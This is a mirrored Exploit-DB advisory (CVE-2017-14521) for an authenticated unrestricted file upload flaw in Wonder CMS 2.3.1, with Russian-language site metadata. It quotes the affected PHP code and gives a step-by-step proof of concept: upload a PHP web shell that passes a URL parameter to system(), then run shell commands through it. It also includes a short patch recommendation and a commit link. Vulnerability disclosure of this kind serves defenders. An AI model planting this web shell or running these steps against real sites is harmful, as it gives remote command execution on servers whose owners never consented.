- 34,599
- 0
- 18 Дек 2022
- EDB-ID
- 43963
- Проверка EDB
-
- Пройдено
- Автор
- SAMRAT DAS
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2017-14521
- Дата публикации
- 2018-02-05
Wonder CMS 2.3.1 - Unrestricted File Upload
Код:
Affected Code:
public static function _uploadFile() { +
- if ( ! wCMS::$loggedIn && ! isset($_FILES['uploadFile']) && ! isset($_REQUEST['token'])) return; + private static function uploadFileAction()
- if (isset($_REQUEST['token']) && $_REQUEST['token'] == wCMS::_generateToken() && isset($_FILES['uploadFile'])) {
Proof of Concept
Steps to Reproduce:
1. Login with a valid credentials
2. Select Files option from the Settings menu of Content
3. Upload a file with php extension containing the below code:
<?php
$cmd=$_GET['cmd'];
system($cmd);
?>
4. Click on Upload
5. Once the file is uploaded Click on the uploaded file and add ?cmd= to
the URL followed by a system command such as whoami,time,date etc.
Example:
http://localhost:8081/wondercms/files/shell.php?cmd=dir
Recommended Patch:
Create a whitelist of allowed filetypes.
The patch that addresses this bug is available here:
https://github.com/robiso/WonderCMS-testRepo/commit/8bd6cf9f3bf6a1d0123eb8b646584a63ee323c8a?diff=split
At line 742- Источник
- www.exploit-db.com
